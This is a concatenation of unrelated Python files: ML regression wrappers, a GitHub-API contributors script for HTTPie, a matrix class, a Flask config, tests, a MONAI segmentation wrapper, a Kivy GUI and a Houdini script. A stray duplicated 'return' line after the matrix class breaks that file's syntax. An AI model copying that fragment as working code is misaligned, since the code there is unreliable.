        # Drop the same columns excluded at training time.
        X = X_test.drop(columns=['sigma_mass_0.0', 'sigma_mass_0.825', 'enzyme_concentration'])
        X = X.values
        y1 = self.k1_bkw_model.predict(X)
        y2 = self.k1_fwd_model.predict(X)
        y3 = self.k2_bkw_model.predict(X)
        y4 = self.k2_fwd_model.predict(X)
        Y_pred = pd.DataFrame({'k1_bwd_pred': y1, 'k1_fwd_pred': y2,
                               'k2_bwd_pred': y3, 'k2_fwd_pred': y4})
        return Y_pred
#-------------------------------------------------------------------------------
# Ridge
class RidgeImplement:
    '''Wrapper of sklearn RidgeCV for our purpose.

    Trains one RidgeCV model per response variable on polynomially expanded
    features, then records train/test scores.

    Methods:
    predict(self, X_test)		Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
    Variables:
    scores		Contains scores on test and train predictions as a pandas DataFrame.
    '''
    def __init__(self, degree=2, interaction_only=False, random_state = 7, realization_split = False):
        # Load the four responses, the feature matrix and the realization ids.
        y1, y2, y3, y4, X, realization = treatment.data_initialization(realiz=True)
        # Expand features polynomially; kept so predict() can apply the
        # identical transformation.
        X = treatment.polynomial_data(X, degree, interaction_only, categories=True)
        self.degree = degree
        self.interaction_only = interaction_only
        # RidgeCV selects alpha internally from the given log-spaced grid.
        self.k1_bkw_model = RidgeCV(alphas=np.logspace(-5,5,40), cv=None, fit_intercept=False)
        self.k1_fwd_model = RidgeCV(alphas=np.logspace(-5,5,60), cv=None, fit_intercept=False)
        self.k2_bkw_model = RidgeCV(alphas=np.logspace(-5,5,60), cv=None, fit_intercept=False)
        self.k2_fwd_model = RidgeCV(alphas=np.logspace(-5,5,40), cv=None, fit_intercept=False)
        indices = ['k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective']
        self.scores = pd.DataFrame({'R^2 train score': 4*[0], 'R^2 test score': 4*[0],
                                    'MSE train score': 4*[0], 'MSE test score': 4*[0]},
                                   index = indices)
        iterator = [(self.k1_bkw_model, y1, indices[0]), (self.k1_fwd_model, y2, indices[1]),
                    (self.k2_bkw_model, y3, indices[2]), (self.k2_fwd_model, y4, indices[3])]
        # Fit each model on a 60/40 split (optionally grouped by realization)
        # and record its train/test R^2 and MSE.
        for model, y, index in iterator:
            X_train, X_test, y_train, y_test = treatment.train_test_split(X, y, test_size=0.4, random_state = random_state) if not realization_split else treatment.train_test_split_realiz(X, y, realization, test_size=0.4, random_state = random_state)
            model.fit(X_train, y_train)
            y_pred_tr = model.predict(X_train)
            y_pred_te = model.predict(X_test)
            #['R^2 train score', 'R^2 test score', 'MSE train score', 'MSE test score']
            self.scores.loc[index] = model.score(X_train, y_train), model.score(X_test, y_test), mean_squared_error(y_train, y_pred_tr), mean_squared_error(y_test, y_pred_te)
    def predict(self, X_test):
        ''' Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.

        Returns pandas DataFrame with columns k1_bwd_pred, k1_fwd_pred, k2_bwd_pred, k2_fwd_pred (logscaled)
        '''
        # Apply the same polynomial expansion used during training.
        X = treatment.polynomial_data(X_test, self.degree, self.interaction_only, categories=True)
        y1 = self.k1_bkw_model.predict(X)
        y2 = self.k1_fwd_model.predict(X)
        y3 = self.k2_bkw_model.predict(X)
        y4 = self.k2_fwd_model.predict(X)
        Y_pred = pd.DataFrame({'k1_bwd_pred': y1, 'k1_fwd_pred': y2,
                               'k2_bwd_pred': y3, 'k2_fwd_pred': y4})
        return Y_pred
#-------------------------------------------------------------------------------
# Support vector regression
class SVRImplement:
    '''Wrapper of sklearn Support Vector Regression for our purpose.

    Fits one RBF-kernel SVR per target ('k1_bwd_effective', 'k1_fwd_effective',
    'k2_bwd_effective', 'k2_fwd_effective', all log-scaled).

    Methods:
    predict(self, X_test)        Predict values for the log of the four effective rate constants.
    Variables:
    scores                       Contains scores on test and train predictions as a pandas DataFrame.
    '''
    def __init__(self, interactions=True, random_state = 5, realization_split = False):
        y1, y2, y3, y4, X, realization = treatment.data_initialization(realiz=True)
        # Remember the feature-expansion choice so predict() can mirror it.
        self.interactions = interactions
        X = treatment.polynomial_data(X, 2, interaction_only=True, categories=True) if interactions else X
        self.k1_bkw_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
        self.k1_fwd_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
        self.k2_bkw_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
        self.k2_fwd_model = SVR(kernel='rbf', max_iter=5*10**4, cache_size=3000)
        indices = ['k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective']
        self.scores = pd.DataFrame({'R^2 train score': 4*[0], 'R^2 test score': 4*[0],
                                    'MSE train score': 4*[0], 'MSE test score': 4*[0]},
                                   index = indices)
        iterator = [(self.k1_bkw_model, y1, indices[0]), (self.k1_fwd_model, y2, indices[1]),
                    (self.k2_bkw_model, y3, indices[2]), (self.k2_fwd_model, y4, indices[3])]
        for model, y, index in iterator:
            # Split either uniformly at random or grouped by realization.
            X_train, X_test, y_train, y_test = treatment.train_test_split(X, y, test_size=0.4, random_state = random_state) if not realization_split else treatment.train_test_split_realiz(X, y, realization, test_size=0.4, random_state = random_state)
            model.fit(X_train, y_train)
            y_pred_tr = model.predict(X_train)
            y_pred_te = model.predict(X_test)
            #['R^2 train score', 'R^2 test score', 'MSE train score', 'MSE test score']
            self.scores.loc[index] = model.score(X_train, y_train), model.score(X_test, y_test), mean_squared_error(y_train, y_pred_tr), mean_squared_error(y_test, y_pred_te)
    def predict(self, X_test):
        ''' Predict values for the log of 'k1_bwd_effective','k1_fwd_effective', 'k2_bwd_effective','k2_fwd_effective' using our model.
        Returns pandas DataFrame with columns k1_bwd_pred, k1_fwd_pred, k2_bwd_pred, k2_fwd_pred (logscaled)
        '''
        # Bug fix: apply the SAME transform used at training time. The
        # original always expanded the features without interaction_only=True,
        # and expanded them even when the models were trained on the raw X.
        X = treatment.polynomial_data(X_test, 2, interaction_only=True, categories=True) if self.interactions else X_test
        y1 = self.k1_bkw_model.predict(X)
        y2 = self.k1_fwd_model.predict(X)
        y3 = self.k2_bkw_model.predict(X)
        y4 = self.k2_fwd_model.predict(X)
        Y_pred = pd.DataFrame({'k1_bwd_pred': y1, 'k1_fwd_pred': y2,
                               'k2_bwd_pred': y3, 'k2_fwd_pred': y4})
        return Y_pred
#-------------------------------------------------------------------------------
# REGRESSIONS
def reproduction_ridge(csv = False, degree=2, interaction_only=False, random_state = 7, realization_split = False):
    '''Ridge reproduction.
    This function reproduces the various ridge regressions presented in the paper,
    fitting a CV ridge regression for the logarithms of 'k1_bwd_effective','k1_fwd_effective',
    'k2_bwd_effective','k2_fwd_effective', as explained in the paper.
    Returns the fitted model.
    Arguments:
    -csv                 False by default. If True the function outputs the predictions in a
                         .csv file (../results/Ridge_reproduction.csv).
    -degree              2 by default. Degree of polynomial expansion.
    -interaction_only    False by default. If True the polynomial expansion only contains degree one terms and cross products.
    -random_state:       7 by default (used in regressions).
    -realization_split:  False by default. If False performs the usual train-test split, if True
                         performs the train-test split realization-wise.
    '''
    #y1, y2, y3, y4, X = treatment.data_initialization()
    fitted_model = RidgeImplement(degree, interaction_only, random_state, realization_split)
    if csv:
        _, _, _, _, X = treatment.data_initialization()
        Y_pred = fitted_model.predict(X)
        Y_pred.to_csv('../results/Ridge_reproduction.csv')
    return fitted_model
def reproduction_svr(csv = False, interactions=True, random_state = 5, realization_split = False):
    '''Support Vector Regression reproduction.
    This function reproduces the SVR presented in the paper,
    fitting four models for the logarithms of 'k1_bwd_effective','k1_fwd_effective',
    'k2_bwd_effective','k2_fwd_effective', as explained in the paper.
    Returns the fitted model.
    Arguments:
    -csv                 False by default. If True the function outputs the predictions in a
                         .csv file (../results/SVR_reproduction.csv).
    -interactions        If True (default) fits SVR on the interaction model, else fits it to the basic design matrix.
    -random_state:       5 by default (used in regressions).
    -realization_split:  False by default. If False performs the usual train-test split, if True
                         performs the train-test split realization-wise.
    '''
    #y1, y2, y3, y4, X = treatment.data_initialization()
    fitted_model = SVRImplement(interactions, random_state, realization_split)
    if csv:
        _, _, _, _, X = treatment.data_initialization()
        Y_pred = fitted_model.predict(X)
        Y_pred.to_csv('../results/SVR_reproduction.csv')
    return fitted_model
def reproduction_XGBoost(csv = False, random_state = 33, realization_split = False):
    '''XGBoost reproduction.
    This function reproduces the best XGBoost regressions obtained,
    fitting four models for the logarithms of 'k1_bwd_effective','k1_fwd_effective',
    'k2_bwd_effective','k2_fwd_effective', as explained in the paper.
    Returns the fitted model.
    Arguments:
    -csv                 False by default. If True the function outputs the predictions in a
                         .csv file (../results/XGB_reproduction.csv).
    -random_state:       33 by default (used in regressions).
    -realization_split:  False by default. If False performs the usual train-test split, if True
                         performs the train-test split realization-wise.
    '''
    #y1, y2, y3, y4, X = treatment.data_initialization()
    fitted_model = XGBImplement(random_state, realization_split)
    if csv:
        _, _, _, _, X = treatment.data_initialization()
        Y_pred = fitted_model.predict(X)
        Y_pred.to_csv('../results/XGB_reproduction.csv')
    return fitted_model
|
"""
Generate the contributors database.
FIXME: replace `requests` calls with the HTTPie API, when available.
"""
import json
import os
import re
import sys
from copy import deepcopy
from datetime import datetime
from pathlib import Path
from subprocess import check_output
from time import sleep
from typing import Any, Dict, Optional, Set
import requests
# Type aliases for readability.
FullNames = Set[str]
GitHubLogins = Set[str]
Person = Dict[str, str]  # NOTE(review): values also include lists ('committed'/'reported'), so this alias is loose
People = Dict[str, Person]
UserInfo = Dict[str, Any]

# Matches "Co-authored-by: Name <email>" trailers in commit messages.
CO_AUTHORS = re.compile(r'Co-authored-by: ([^<]+) <').finditer
API_URL = 'https://api.github.com'
REPO = OWNER = 'httpie'
# NOTE(review): GitHub's path is /repos/{owner}/{repo}; the order below is
# swapped, which is harmless only because REPO and OWNER are the same string.
REPO_URL = f'{API_URL}/repos/{REPO}/{OWNER}'
HERE = Path(__file__).parent
DB_FILE = HERE / 'people.json'
# Template record for a person; deep-copied by new_person().
DEFAULT_PERSON: Person = {'committed': [], 'reported': [], 'github': '', 'twitter': ''}
# Issues carrying any of these labels are ignored when collecting reporters.
SKIPPED_LABELS = {'invalid'}
GITHUB_TOKEN = os.getenv('GITHUB_TOKEN')
assert GITHUB_TOKEN, 'GITHUB_TOKEN envar is missing'
class FinishedForNow(Exception):
    """Raised when remaining GitHub rate limit is zero.

    Callers catch this to save partial results and exit with a non-zero status.
    """
def main(previous_release: str, current_release: str) -> int:
    """Refresh the contributors DB for the range (previous_release, current_release].

    Returns a process exit status: 0 on success, 1 when the GitHub rate limit
    was hit (whatever was fetched so far is still saved).
    """
    since = release_date(previous_release)
    until = release_date(current_release)
    contributors = load_awesome_people()
    # Bug fix: initialise these before the try block -- if find_committers()
    # or find_reporters() raised, they were left undefined and the merge
    # below crashed with NameError instead of saving partial data.
    committers: FullNames = set()
    reporters: GitHubLogins = set()
    try:
        committers = find_committers(since, until)
        reporters = find_reporters(since, until)
    except Exception as exc:
        # We want to save what we fetched so far. So pass.
        print(' !! ', exc)
    try:
        merge_all_the_people(current_release, contributors, committers, reporters)
        fetch_missing_users_details(contributors)
    except FinishedForNow:
        # We want to save what we fetched so far. So pass.
        print(' !! Committers:', committers)
        print(' !! Reporters:', reporters)
        exit_status = 1
    else:
        exit_status = 0
    save_awesome_people(contributors)
    return exit_status
def find_committers(since: str, until: str) -> FullNames:
    """Collect the full names of everyone who committed between *since* and *until*.

    Includes co-authors extracted from "Co-authored-by:" commit trailers.
    """
    commits_url = f'{REPO_URL}/commits'
    per_page = 100
    params = {'since': since, 'until': until, 'per_page': per_page}
    names: FullNames = set()
    page = 0
    while True:
        page += 1
        params['page'] = page
        batch = fetch(commits_url, params=params)
        for entry in batch:
            commit = entry['commit']
            names.add(commit['author']['name'])
            debug(' >>> Commit', entry['html_url'])
            names.update(match.group(1) for match in CO_AUTHORS(commit['message']))
        # A short page means we have exhausted the commit list.
        if len(batch) < per_page:
            return names
def find_reporters(since: str, until: str) -> GitHubLogins:
    """Collect GitHub logins of users whose issues were closed in the range."""
    search_url = f'{API_URL}/search/issues'
    per_page = 100
    params = {
        'q': f'repo:{REPO}/{OWNER} is:issue closed:{since}..{until}',
        'per_page': per_page,
    }
    logins: GitHubLogins = set()
    page = 0
    while True:
        page += 1
        params['page'] = page
        payload = fetch(search_url, params=params)
        for issue in payload['items']:
            # Filter out unwanted labels.
            if any(label['name'] in SKIPPED_LABELS for label in issue['labels']):
                continue
            debug(' >>> Issue', issue['html_url'])
            logins.add(issue['user']['login'])
        # A short page means the search results are exhausted.
        if len(payload['items']) < per_page:
            return logins
def merge_all_the_people(release: str, contributors: People, committers: FullNames, reporters: GitHubLogins) -> None:
    """
    Merge this release's committers and reporters into the contributors DB.
    Known people are updated in place; newly seen people get a fresh record.
    Both *committers* and *reporters* are consumed (mutated) as entries match.

    >>> contributors = {'Alice': new_person(github='alice', twitter='alice')}
    >>> merge_all_the_people('2.6.0', contributors, {}, {})
    >>> contributors
    {'Alice': {'committed': [], 'reported': [], 'github': 'alice', 'twitter': 'alice'}}

    >>> contributors = {'Bob': new_person(github='bob', twitter='bob')}
    >>> merge_all_the_people('2.6.0', contributors, {'Bob'}, {'bob'})
    >>> contributors
    {'Bob': {'committed': ['2.6.0'], 'reported': ['2.6.0'], 'github': 'bob', 'twitter': 'bob'}}

    >>> contributors = {'Charlotte': new_person(github='charlotte', twitter='charlotte', committed=['2.5.0'], reported=['2.5.0'])}
    >>> merge_all_the_people('2.6.0', contributors, {'Charlotte'}, {'charlotte'})
    >>> contributors
    {'Charlotte': {'committed': ['2.5.0', '2.6.0'], 'reported': ['2.5.0', '2.6.0'], 'github': 'charlotte', 'twitter': 'charlotte'}}
    """
    # Update known contributors.
    for name, details in contributors.items():
        if name in committers:
            if release not in details['committed']:
                details['committed'].append(release)
            # Consume matched names: whatever remains afterwards is new people.
            committers.remove(name)
        if details['github'] in reporters:
            if release not in details['reported']:
                details['reported'].append(release)
            reporters.remove(details['github'])
    # Add new committers.
    for name in committers:
        user_info = user(fullname=name)
        contributors[name] = new_person(
            github=user_info['login'],
            twitter=user_info['twitter_username'],
            committed=[release],
        )
        # A new committer may have reported issues in this release too.
        if user_info['login'] in reporters:
            contributors[name]['reported'].append(release)
            reporters.remove(user_info['login'])
    # Add new reporters.
    for github_username in reporters:
        user_info = user(github_username=github_username)
        contributors[user_info['name'] or user_info['login']] = new_person(
            github=github_username,
            twitter=user_info['twitter_username'],
            reported=[release],
        )
def release_date(release: str) -> str:
    """Return the ISO-8601 timestamp of the commit that *release* points at."""
    raw = check_output(
        ['git', 'log', '-1', '--format=%ai', release], text=True
    ).strip()
    parsed = datetime.strptime(raw, '%Y-%m-%d %H:%M:%S %z')
    return parsed.isoformat()
def load_awesome_people() -> People:
    """Read the people database; return {} when the file is absent or invalid."""
    try:
        return json.loads(DB_FILE.read_text(encoding='utf-8'))
    except (FileNotFoundError, ValueError):
        return {}
def fetch(url: str, params: Optional[Dict[str, str]] = None) -> UserInfo:
    """GET a GitHub API URL and return the decoded JSON payload.

    Retries up to 5 times on rate limiting (HTTP 403), sleeping until the
    advertised reset time when the wait is short. Raises FinishedForNow when
    the wait would exceed 20 seconds, and ValueError when all retries are
    exhausted.
    """
    headers = {
        'Accept': 'application/vnd.github.v3+json',
        # Bug fix: the correct request header is 'Authorization', not
        # 'Authentication' -- the token was silently ignored before.
        'Authorization': f'token {GITHUB_TOKEN}'
    }
    for retry in range(1, 6):
        debug(f'[{retry}/5]', f'{url = }', f'{params = }')
        with requests.get(url, params=params, headers=headers) as req:
            try:
                req.raise_for_status()
            except requests.exceptions.HTTPError as exc:
                if exc.response.status_code == 403:
                    # 403 Client Error: rate limit exceeded for url: ...
                    now = int(datetime.utcnow().timestamp())
                    xrate_limit_reset = int(exc.response.headers['X-RateLimit-Reset'])
                    wait = xrate_limit_reset - now
                    if wait > 20:
                        raise FinishedForNow()
                    debug(' !', 'Waiting', wait, 'seconds before another try ...')
                    sleep(wait)
                    continue
                # Bug fix: non-403 HTTP errors fell through and returned the
                # error body as if it were data; surface them instead.
                raise
            return req.json()
    # Bug fix: 'assert ValueError(...)' always passed (an exception instance
    # is truthy) -- actually raise once the retries are exhausted.
    raise ValueError('Rate limit exceeded')
def new_person(**kwargs: str) -> Person:
    """Build a fresh Person record, overriding the defaults with *kwargs*."""
    person = deepcopy(DEFAULT_PERSON)
    person.update(kwargs)
    return person
def user(fullname: Optional[str] = '', github_username: Optional[str] = '') -> UserInfo:
    """Resolve a GitHub user either directly by login or via full-name search.

    Returns None implicitly when no search query produces a hit.
    """
    if github_username:
        return fetch(f'{API_URL}/users/{github_username}')
    search_url = f'{API_URL}/search/users'
    for query in (f'fullname:{fullname}', f'user:{fullname}'):
        hits = fetch(search_url, params={
            'q': f'repo:{REPO}/{OWNER} {query}',
            'per_page': 1,
        })
        if hits['items']:
            return fetch(hits['items'][0]['url'])
def fetch_missing_users_details(people: People) -> None:
    """Fill in any missing GitHub login / Twitter handle for each person."""
    for fullname, person in people.items():
        if person['github'] and person['twitter']:
            continue  # nothing missing for this person
        info = user(github_username=person['github'], fullname=fullname)
        person['github'] = person['github'] or info['login']
        person['twitter'] = person['twitter'] or info['twitter_username']
def save_awesome_people(people: People) -> None:
    """Write the people database as pretty-printed, key-sorted JSON."""
    DB_FILE.write_text(
        json.dumps(people, indent=4, sort_keys=True),
        encoding='utf-8',
    )
def debug(*args: Any) -> None:
    """Print *args* only when the DEBUG=1 environment variable is set."""
    if os.getenv('DEBUG') != '1':
        return
    print(*args)
if __name__ == '__main__':
    ret = 1
    try:
        ret = main(*sys.argv[1:])
    except TypeError:
        # Wrong number of CLI arguments makes main() raise TypeError.
        ret = 2
        print(f'''
Fetch contributors to a release.

Usage:
    python {sys.argv[0]} <RELEASE N-1> <RELEASE N>

Example:
    python {sys.argv[0]} 2.4.0 2.5.0

Define the DEBUG=1 environment variable to enable verbose output.
''')
    # Bug fix in the usage line above: the script name was printed twice
    # ('python script script <RELEASE N-1> ...').
    except KeyboardInterrupt:
        ret = 255
    sys.exit(ret)
|
import Operacije
class Matrika:
    """Matrix wrapper that delegates all arithmetic to the Operacije module."""

    def __init__(self, seznam):
        # 'sez' holds the raw list-of-lists representation of the matrix.
        self.sez = seznam

    def __add__(self, other):
        return Operacije.vsota(self.sez, other.sez)

    def __sub__(self, other):
        # a - b implemented as a + (-1 * b).
        negirana = Operacije.mnozenje_s_skalarjem(other.sez, -1)
        return Operacije.vsota(self.sez, negirana)

    def __mul__(self, other):
        # An int operand means scalar multiplication; otherwise matrix product.
        if type(other) is int:
            return Operacije.mnozenje_s_skalarjem(self.sez, other)
        return Operacije.produkt(self.sez, other.sez)

    def hadamard_product(self, other):
        # Element-wise (Hadamard) product.
        return Operacije.hadamardov_produkt(self.sez, other.sez)

    def __pow__(self, potenca):
        return Operacije.potenca(self.sez, potenca.sez)

    def det(self):
        # Determinant.
        return Operacije.determinanta(self.sez)

    def transpose(self):
        return Operacije.transponirano(self.sez)

    def tr(self):
        # Trace.
        return Operacije.sled(self.sez)
return Operacije.sled(self.sez)
class Racun:
    """Registry of named matrices/operations with a dispatcher to execute them."""

    # Unary operations: name -> callable taking one Matrika.
    _UNARY = {
        "det": lambda m: m.det(),
        "trace": lambda m: m.tr(),
        "transpose": lambda m: m.transpose(),
    }
    # Binary operations: name -> callable taking two Matrika objects.
    _BINARY = {
        "plus": lambda a, b: a + b,
        "minus": lambda a, b: a - b,
        "produkt": lambda a, b: a * b,
        "hadamard": lambda a, b: a.hadamard_product(b),
        "potenca": lambda a, b: a ** b,
    }

    def __init__(self):
        self.dimenzije = {}
        self.matrike = {}
        self.operacije = {}

    def shrani_dimenzije(self, ime, m, n):
        # Record the (rows, cols) pair under the matrix name.
        self.dimenzije[ime] = [m, n]

    def shrani_matriko(self, ime, seznam):
        self.matrike[ime] = Matrika(seznam)

    def shrani_operacijo(self, ime, operacija):
        self.operacije[ime] = operacija

    def izvedi_operacijo(self, ime_prve, operacija, ime_druge=None):
        """Run *operacija* on the stored matrices; None for an unknown name."""
        prva = self.matrike[ime_prve]
        if operacija in self._UNARY:
            return self._UNARY[operacija](prva)
        # Binary operations need the second operand (KeyError when missing,
        # exactly as in the original lookup).
        druga = self.matrike[ime_druge]
        izvedba = self._BINARY.get(operacija)
        return izvedba(prva, druga) if izvedba else None
|
"""Default configuration
Use env var to override
"""
import os
ENV = os.getenv("FLASK_ENV")
DEBUG = ENV == "development"
SECRET_KEY = os.getenv("SECRET_KEY")
|
from nose.tools import istest, assert_equal
from precisely import starts_with
from precisely.results import matched, unmatched
@istest
def starts_with_matches_when_actual_string_starts_with_value_passed_to_matcher():
    # A matcher for the prefix "ab" accepts any string beginning with it...
    matcher = starts_with("ab")
    for candidate in ("ab", "abc", "abcd"):
        assert_equal(matched(), matcher.match(candidate))
    # ...and rejects strings that do not, reporting the actual value.
    assert_equal(unmatched("was 'a'"), matcher.match("a"))
    assert_equal(unmatched("was 'cab'"), matcher.match("cab"))
@istest
def starts_with_description_describes_value():
    # describe() should echo the expected prefix.
    assert_equal("starts with 'ab'", starts_with("ab").describe())
|
# This is currently configured to work with models produced in exploration6.ipynb
# in https://github.com/ebrahimebrahim/lung-seg-exploration
# This wrapper class will handle loading a model and running inference
import monai
import numpy as np
import torch
from .segmentation_post_processing import SegmentationPostProcessing
class SegmentationModel:
    def __init__(self, load_path):
        """
        This class provides a way to interface with a lung segmentation model trained in MONAI.
        It loads the model on construction, and it handles loading and transforming
        images and running inference.
        """
        # Map to CPU so the checkpoint loads on machines without a GPU.
        model_dict = torch.load(load_path, map_location=torch.device('cpu'))
        self.seg_net = model_dict['model']
        # Training metadata bundled in the checkpoint; kept for inspection,
        # not used during inference.
        self.learning_rate = model_dict['learning_rate']
        self.training_losses = model_dict['training_losses']
        self.validation_losses = model_dict['validation_losses']
        self.epoch_number = model_dict['epoch_number']
        self.best_validation_loss = model_dict['best_validation_loss']
        self.best_validation_epoch = model_dict['best_validation_epoch']
        # Square input resolution the network was trained on.
        self.image_size = model_dict['image_size']
        # Transforms a given image to the input format expected by the segmentation network
        self.transform = monai.transforms.Compose([
            monai.transforms.CastToType(dtype=np.float32), # TODO dtype should have been included in the model_dict
            monai.transforms.AddChannel(),
            monai.transforms.Resize(
                spatial_size=(self.image_size,self.image_size),
                mode = 'bilinear',
                align_corners=False
            ),
            monai.transforms.ToTensor()
        ])
        self.seg_post_process = SegmentationPostProcessing()
    def run_inference(self, img):
        """
        Execute segmentation model on a chest xray, given as an array of shape (height, width).
        The image axes are assumed to be in "matrix" order, with the origin in the upper left of the image:
        - The 0 axis should go along the height of the radiograph, towards patient-inferior
        - The 1 axis should go along the width of the radiograph, towards patient-left/image-right
        The segmentation model should include post-processing but this is SKIPPED for now; TODO.
        Currently it's just a segmentation network.
        Returns (seg_mask, model_to_img_matrix), where:
        seg_mask is a torch tensor of shape (height, width), a binary label mask indicating the lung field
        model_to_img_matrix is a 2D numpy array representing the linear transform from the coordinate space of the segmentation model
        output to the original coordinate space of the given array img.
        """
        if len(img.shape) != 2:
            raise ValueError("img must be a 2D array")
        # Disable training-only behavior (dropout, batch-norm updates).
        self.seg_net.eval()
        img_input = self.transform(img)
        # Add a batch dimension for the forward pass, then drop it.
        seg_net_output = self.seg_net(img_input.unsqueeze(0))[0]
        # assumption at the moment is that we have 2-channel image out (i.e. purely binary segmentation was done)
        assert(seg_net_output.shape[0]==2)
        # Argmax over the channel axis: channel 1 is treated as "lung".
        _, max_indices = seg_net_output.max(dim=0)
        seg_mask = (max_indices==1).type(torch.uint8)
        # Diagonal scale mapping model-output pixel coords back to the
        # original image's pixel coords (per-axis height/width scaling).
        model_to_img_matrix = np.diag(np.array(img.shape)/self.image_size)
        return seg_mask, model_to_img_matrix # TODO returning early because post processing causes crash due to ITK python issues
        # Unreachable until the TODO above is resolved.
        seg_processed = self.seg_post_process(seg_mask)
        return seg_processed, model_to_img_matrix
|
"""Graphical User Interface for the application that is done by kivy graphics library."""
import os
import signal
import socket
import subprocess
from subprocess import Popen
import webbrowser
from pathlib import Path
import datetime as dt
import threading
import kivy
kivy.require('1.10.1')
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.label import Label
from kivy.clock import Clock
from kivy.properties import StringProperty, ObjectProperty
from kivy.uix.button import Button
from kivy.uix.popup import Popup
from kivy.lang import Builder
import clean_debug_stream as cleaner
import dash_plotter_function as dp
class LoadDialog(Screen):
    """Screen that lets the user pick a raw debug-stream file to clean."""

    # Path of the most recently produced cleaned-data file.
    clean_data = StringProperty("")

    def load(self, file_selection):
        """Clean the selected file, start the dash server and switch screens."""
        timestamp = dt.datetime.now().strftime("%d_%m_%Y_%H_%M_%S")
        self.clean_data = os.path.join(
            os.path.dirname(__file__),
            "Cleaned Data",
            "clean_data_" + timestamp,
        )
        _, channels = cleaner.clean_terminal_data_stream(
            file_selection[0],
            self.clean_data,
        )
        dp.initialize_layout(self.clean_data, channels)
        # Run the dash server in a daemon thread so the GUI stays responsive.
        server_thread = threading.Thread(target=dp.app.run_server)
        server_thread.daemon = True
        server_thread.start()
        self.manager.current = "result"
class ResultScreen(Screen):
    """Screen shown after cleaning: displays a clickable link to the local
    dash server and the path of the saved cleaned-data file."""
    # Host IP, refreshed every second by check_ip (this is the initial value).
    ip_adr = socket.gethostbyname(socket.gethostname())
    label_text = StringProperty()
    data_file_text = StringProperty("")
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Refresh the displayed info once per second.
        Clock.schedule_interval(self.check_ip, 1)
    def check_ip(self, dt):
        """This function is used to update ip address on the text link."""
        # NOTE(review): the Clock delta-time parameter 'dt' shadows the
        # module-level 'datetime as dt' alias; harmless here because the
        # module is not used inside this method.
        self.ip_adr = socket.gethostbyname(socket.gethostname())
        self.label_text = (
            'Data has been cleaned! Go to the address '
            '[ref=addr][u]http://127.0.0.1:8050[/u][/ref]'
            ' to view the drive data.\n'
            'Clicking the link opens the browser to view the data. '
            'Data is also saved to\n' + self.data_file_text
        )
    def webopen(self):
        """
        This is used to open web browser when clicking hyperlink.
        See drivedata.kv.
        """
        webbrowser.open_new('http://127.0.0.1:8050')
class DriveDataApp(App):
    """
    Application to process KONE drive data.
    See driverdata.kv for implementation.
    """
    # NOTE(review): another comment in this module references 'drivedata.kv';
    # confirm which .kv filename is actually correct.
if __name__ == '__main__':
    #process = MonitoringProcess()
    # Launch the Kivy application (blocks until the window is closed).
    DriveDataApp().run()
|
import os
import testinfra.utils.ansible_runner
# Run these tests against every host in the Molecule-generated inventory.
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
    os.environ["MOLECULE_INVENTORY_FILE"]
).get_hosts("all")
def test_nginx_installed(host):
    """The SCL nginx 1.8 package must be installed."""
    assert host.package("rh-nginx18").is_installed
def test_nginx_config_exists(host):
    """nginx.conf must exist as a root-owned regular file."""
    cfg = host.file("/etc/opt/rh/rh-nginx18/nginx/nginx.conf")
    assert cfg.exists
    assert cfg.is_file
    assert cfg.user == "root"
    assert cfg.group == "root"
def test_nginx_vhost_example_exists(host):
    # NOTE(review): this checks the same path as test_nginx_config_exists
    # (nginx.conf), not a vhost/example file -- likely a copy-paste slip.
    # Confirm the intended vhost path before changing it.
    nginx_vhost = host.file("/etc/opt/rh/rh-nginx18/nginx/nginx.conf")
    assert nginx_vhost.exists
    assert nginx_vhost.is_file
    assert nginx_vhost.user == "root"
    assert nginx_vhost.group == "root"
def test_nginx_listening_http(host):
    """nginx must be listening on all interfaces on port 80."""
    sock = host.socket("tcp://0.0.0.0:80")
    assert sock.is_listening
|
import hou
import nodegraph
# Accessors for tool state stored on hou.session, so it survives between
# invocations of this shelf tool within the same Houdini session.
def getRunning():
    # Whether the selection-callback workflow is active (1) or not (None).
    return hou.session.scRunning
def setRunning(input):
    hou.session.scRunning = input
def getLast():
    # The previously selected node list.
    return hou.session.scLastNode
def setLast(node):
    hou.session.scLastNode = node
def getCurrent():
    # The most recent selection (list of nodes).
    return hou.session.scCurrentNode
def setCurrent(node):
    hou.session.scCurrentNode = node
def initVariables():
    # Reset all session state and (re)register the selection callback,
    # then mark the workflow as running.
    hou.ui.removeAllSelectionCallbacks()
    hou.session.scRunning = None
    hou.session.scCurrentNode = None
    hou.session.scLastNode = None
    hou.ui.addSelectionCallback(selectionCallback)
    setRunning(1)
def selectionCallback(selection):
    """Track the current and previous node selections on hou.session.

    Invoked by Houdini on every selection change; shifts the current
    selection into "last" before recording the new one, so nodes can be
    wired together later.
    """
    try:
        if len(selection) > 0:
            if getCurrent() is not None:
                setLast(getCurrent())
            setCurrent(selection)
    except Exception as exc:
        # Bug fix: was a bare 'except:' that also swallowed SystemExit and
        # KeyboardInterrupt; catch only real errors and report what happened.
        print("A selection exception occurred:", exc)
def connectByHeight(node1, node2):
    """Wire two sibling nodes so the higher one feeds into the lower one."""
    if not sameParents(node1, node2):
        return
    # The node with the greater Y position becomes the source ("last").
    if node1.position()[1] > node2.position()[1]:
        higher, lower = node1, node2
    else:
        higher, lower = node2, node1
    setCurrent([lower])
    setLast([higher])
    connectByLastSelection()
def sameParents(node1, node2):
    """Return True when both nodes live under the same parent network."""
    return node1.parent().name() == node2.parent().name()
def connectByLastSelection():
    """Connect the previously selected node into the currently selected one."""
    previous = getLast()[0]
    selected = getCurrent()[0]
    if previous is None or selected is None:
        return
    if not sameParents(previous, selected):
        return
    # Only wire up when the source has outputs and the target has inputs.
    if len(previous.outputConnectors()) > 0 and len(selected.inputConnectors()) > 0:
        slot = switchInput(selected, previous)
